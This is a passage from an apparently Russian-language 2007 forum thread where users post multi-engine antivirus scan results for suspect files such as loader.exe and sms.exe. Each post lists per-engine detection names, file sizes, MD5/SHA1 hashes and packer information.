eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 VirTool:Win32/Obfuscator.C
NOD32v2 2423 2007.07.26 a variant of Win32/Spy.Nuklus
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 Suspicious file
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 9216 bytes
MD5: b1682db94c7ab7bb53aa90d67df72d42
SHA1: c24da5e473abc41954347b406c9ea84754241c38
packers: UPack
[/QUOTE]

[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 BDS/Afcore.cb.2.B
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 -
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 -
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 58880 bytes
MD5: 4b137cb5b8291dc7d71de53299826db5
SHA1: 1a21926475389802039e4943cf2060921c11997a
packers: UPX
packers: UPX
packers: UPX
[/QUOTE]
26.07.2007, 19:18
Muffler

File _________________________________ received on 07.26.2007 16:57:15

[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
[B]eTrust-Vet 31.1.5004 2007.07.25 HTML/Mallar[/B]
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 Virus:HTML/Allaple.A[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 HTML/Instancob.A[/B]
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -[/QUOTE]

Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d
26.07.2007, 22:30
V_Bond

AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
[B]Avast 4.7.997.0 2007.07.26 Win32:Spyware-gen.[/B]
AVG 7.5.0.476 2007.07.26 -
[B]BitDefender 7.2 2007.07.26 Application.Cool.Remote.Control.1.2[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 RemoteAccess:Win32/CoolRemoteControl[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 Generic Malware[/B]
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Webwasher-Gateway 6.5.3 2007.07.26 -
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4
27.07.2007, 18:16
Winsent

File 1.scr received on 07.27.2007 16:12:33 (CET)

Antivirus Version Last Update Result

AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Crypt.XPACK.Gen[/B]
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.27 -
AVG 7.5.0.476 2007.07.27 -
[B]BitDefender 7.2 2007.07.27 Trojan.PWS.LDPinch.TAW
CAT-QuickHeal 9.00 2007.07.26 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.27 -
DrWeb 4.33 2007.07.27 -
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -
Fortinet 2.91.0.0 2007.07.27 -
F-Prot 4.3.2.48 2007.07.27 -
[B]F-Secure 6.70.13030.0 2007.07.27 Packed.Win32.PolyCrypt.b
Ikarus T3.1.1.8 2007.07.27 Trojan-Downloader.Win32.Small.cyn
Kaspersky 4.0.2.24 2007.07.27 Packed.Win32.PolyCrypt.b[/B]
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.27 Trojan:Win32/Anomaly.gen!A[/B]
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.27 -
[B]Rising 19.33.42.00 2007.07.27 Packer.RyCrypt
Sophos 4.19.0 2007.07.26 Mal/Basine-C[/B]
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
VBA32 3.12.2.1 2007.07.27 -
[B]VirusBuster 4.3.26:9 2007.07.27 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.27 Trojan.Crypt.XPACK.Gen[/B]
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f
27.07.2007, 20:38
drongo

T-11377
[code] File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 HEUR/Crypted[/B]
[B]Authentium 4.93.8 2007.07.27 Possibly a new variant of W32/Threat-HLLSI-based!Maximus[/B]
Avast 4.7.997.0 2007.07.27 -
[B]AVG 7.5.0.476 2007.07.27 PSW.Generic5.KY
BitDefender 7.2 2007.07.27 Trojan.PWS.Goldun.SYT[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.27 -
[B]DrWeb 4.33 2007.07.27 Trojan.PWS.GoldSpy
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -[B]
Fortinet 2.91.0.0 2007.07.27 Dowdec!tr
F-Prot 4.3.2.48 2007.07.27 W32/Threat-HLLSI-based!Maximus
F-Secure 6.70.13030.0 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
[B]Ikarus T3.1.1.8 2007.07.27 Trojan-PWS.Goldun.SYT
Kaspersky 4.0.2.24 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
McAfee 5084 2007.07.26 -
Microsoft 1.2704 2007.07.27 -
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
[B]Panda 9.0.0.4 2007.07.27 Dialer.KMO[/B]
Rising 19.33.42.00 2007.07.27 -
[B]Sophos 4.19.0 2007.07.26 Troj/Dowdec-Gen
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious[/B]
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
[B]VBA32 3.12.2.1 2007.07.27 suspected of Downloader.Small.33[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.27 Heuristic.Crypted[/B]
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.[/code]
28.07.2007, 17:25
Синауридзе Александр

File loader.exe received on 07.28.2007 14:59:45 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz[/B]
Authentium 4.93.8 2007.07.27 -
[B]Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD[/B]
[B]AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ[/B]
[B]BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4[/B]
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.28 -
[B]DrWeb 4.33 2007.07.28 DLOADER.Trojan[/B]
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
[B]eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A[/B]
Ewido 4.0 2007.07.28 -
FileAdvisor 1 2007.07.28 -
[B]Fortinet 2.91.0.0 2007.07.28 Heuri.E[/B]
[B]F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus[/B]
[B]F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
[B]Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc[/B]
[B]Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.28 -
[B]NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus[/B]
[B]Norman 5.80.02 2007.07.27 W32/Downloader[/B]
[B]Panda 9.0.0.4 2007.07.28 Generic Malware[/B]
[B]Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab[/B]
[B]Sophos 4.19.0 2007.07.26 Mal/Heuri-E[/B]
[B]Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
Symantec 10 2007.07.28 -
[B]TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz[/B]
[B]VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz[/B]

Additional information
File size: 1020 bytes
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0
30.07.2007, 09:30
ISO

File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: Loading ... finished
Loading server information...
Compact
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.30 -
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
BitDefender 7.2 2007.07.30 -
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.30 -
DrWeb 4.33 2007.07.30 -
[B]eSafe 7.0.15.0 2007.07.29 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5010 2007.07.28 -
Ewido 4.0 2007.07.29 -
FileAdvisor 1 2007.07.30 -
Fortinet 2.91.0.0 2007.07.30 -
F-Prot 4.3.2.48 2007.07.27 -
F-Secure 6.70.13030.0 2007.07.30 -
[B]Ikarus T3.1.1.8 2007.07.29 Backdoor.Win32.Delf.apa[/B]
Kaspersky 4.0.2.24 2007.07.30 -
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.30 -
NOD32v2 2428 2007.07.30 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.29 -
Rising 19.34.00.00 2007.07.30 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.28 -
Symantec 10 2007.07.30 -
TheHacker 6.1.7.158 2007.07.30 -
VBA32 3.12.2.1 2007.07.30 -
VirusBuster 4.3.26:9 2007.07.29 -
[B]Webwasher-Gateway 6.0.1 2007.07.30 Win32.ModifiedUPX.gen!90 (suspicious)[/B]
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
packers: UPX
packers: UPX
31.07.2007, 09:47
Winsent

File sms.exe received on 07.31.2007 07:49:38 (CET)

Antivirus Version Last Update Result

AhnLab-V3 2007.7.31.1 2007.07.31 -
[B]AntiVir 7.4.0.54 2007.07.30 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.30 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
[B]BitDefender 7.2 2007.07.31 Trojan.PWS.LDPinch.TAW[/B]
CAT-QuickHeal 9.00 2007.07.30 -
ClamAV 0.91 2007.07.31 -
DrWeb 4.33 2007.07.31 -
eSafe 7.0.15.0 2007.07.29 -
eTrust-Vet 31.1.5018 2007.07.31 -
Ewido 4.0 2007.07.30 -
FileAdvisor 1 2007.07.31 -
Fortinet 2.91.0.0 2007.07.31 -
F-Prot 4.3.2.48 2007.07.30 -
F-Secure 6.70.13030.0 2007.07.31 -
Ikarus T3.1.1.8 2007.07.31 -
Kaspersky 4.0.2.24 2007.07.31 -
[B]McAfee 5086 2007.07.30 New Malware.ek[/B]
Microsoft 1.2704 2007.07.30 -
NOD32v2 2429 2007.07.30 -
[B]Norman 5.80.02 2007.07.30 Suspicious_P.gen[/B]
Panda 9.0.0.4 2007.07.31 -
Prevx1 V2 2007.07.31 -
Rising 19.34.11.00 2007.07.31 -
[B]Sophos 4.19.0 2007.07.26 Mal/Basine-C
Sunbelt 2.2.907.0 2007.07.31 VIPRE.Suspicious[/B]
Symantec 10 2007.07.31 -
TheHacker 6.1.7.159 2007.07.31 -
VBA32 3.12.2.2 2007.07.30 -
[B]VirusBuster 4.3.26:9 2007.07.30 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.31 Heuristic.Crypted[/B]

Показывать 40 сообщений этой темы на одной странице